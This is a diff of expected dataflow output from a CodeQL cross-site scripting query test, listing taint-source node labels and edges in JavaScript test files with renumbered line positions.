tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:20:13:20:45 | target | semmle.label | target | | typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | | typeahead.js:21:12:21:17 | target | semmle.label | target | @@ -811,8 +811,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:6:18:6:23 | target | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:8:17:8:22 | target | provenance | | 
@@ -919,8 +919,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | 
@@ -930,8 +930,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | 
@@ -949,217 +949,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
